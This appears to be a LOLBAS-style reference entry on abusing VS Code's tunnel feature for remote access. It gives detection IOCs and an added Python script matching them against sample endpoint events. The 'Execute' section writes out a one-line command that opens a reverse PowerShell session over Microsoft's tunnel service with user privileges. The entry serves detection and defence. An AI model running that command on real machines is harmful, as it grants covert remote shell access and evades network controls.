VSCode binary, also portable (CLI) version
Paths:
- %LOCALAPPDATA%\Programs\Microsoft VS Code\Code.exe
- C:\Program Files\Microsoft VS Code\Code.exe
- C:\Program Files (x86)\Microsoft VS Code\Code.exe
Resources:
Detection:
- IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com
- IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe
- IOC: File write of code_tunnel.json; its location is configurable but defaults to %UserProfile%\.vscode-cli\code_tunnel.json
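The three IOCs above can be checked mechanically against endpoint telemetry. The following is an added example, not part of the original entry: it applies the process-tree, file-write and network IOCs to a few constructed Sysmon-style events (the event layout, PIDs and paths are assumptions made for the example).

```python
# Added example: apply the VS Code tunnel IOCs to constructed endpoint events.
# Event shape (type, fields) is an assumption for this example, not a real schema.
TUNNEL_HOST = "global.rel.tunnels.api.visualstudio.com"
TUNNEL_CHAIN = ["code.exe", "cmd.exe", "node.exe", "winpty-agent.exe"]
TUNNEL_FILE = "code_tunnel.json"

# Constructed sample events, not real telemetry.
EVENTS = [
    ("process", {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft VS Code\Code.exe"}),
    ("process", {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe"}),
    ("process", {"pid": 102, "ppid": 101, "image": r"C:\Program Files\Microsoft VS Code\node.exe"}),
    ("process", {"pid": 103, "ppid": 102, "image": r"C:\Users\alice\.vscode-cli\winpty-agent.exe"}),
    ("file", {"pid": 100, "path": r"C:\Users\alice\.vscode-cli\code_tunnel.json"}),
    ("network", {"pid": 100, "dest_host": TUNNEL_HOST, "dest_port": 443}),
    ("process", {"pid": 200, "ppid": 1, "image": r"C:\Windows\explorer.exe"}),
]

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestry(procs: dict, pid: int) -> list:
    """Image basenames from the oldest known ancestor down to pid."""
    chain = []
    while pid in procs:
        chain.append(_basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain[::-1]

def detect(events) -> list:
    """Return one finding string per event that matches an IOC from the entry."""
    procs = {e["pid"]: e for t, e in events if t == "process"}
    findings = []
    for t, e in events:
        if t == "process":
            chain = ancestry(procs, e["pid"])
            # The IOC chain must appear as the trailing part of the ancestry.
            if chain[-len(TUNNEL_CHAIN):] == TUNNEL_CHAIN:
                findings.append(f"process_tree pid={e['pid']}: {' -> '.join(chain)}")
        elif t == "file" and _basename(e["path"]) == TUNNEL_FILE:
            # The file location is configurable, so match on the file name only.
            findings.append(f"file_write pid={e['pid']}: {e['path']}")
        elif t == "network" and e["dest_host"].lower() == TUNNEL_HOST:
            findings.append(f"network pid={e['pid']}: {e['dest_host']}:{e['dest_port']}")
    return findings

if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```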
Execute
Starts a reverse PowerShell connection to global.rel.tunnels.api.visualstudio.com over WebSockets; command:
code.exe tunnel --accept-server-license-terms --name "tunnel-name"
Usecase: Reverse PowerShell session over MS provided infrastructure.
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1219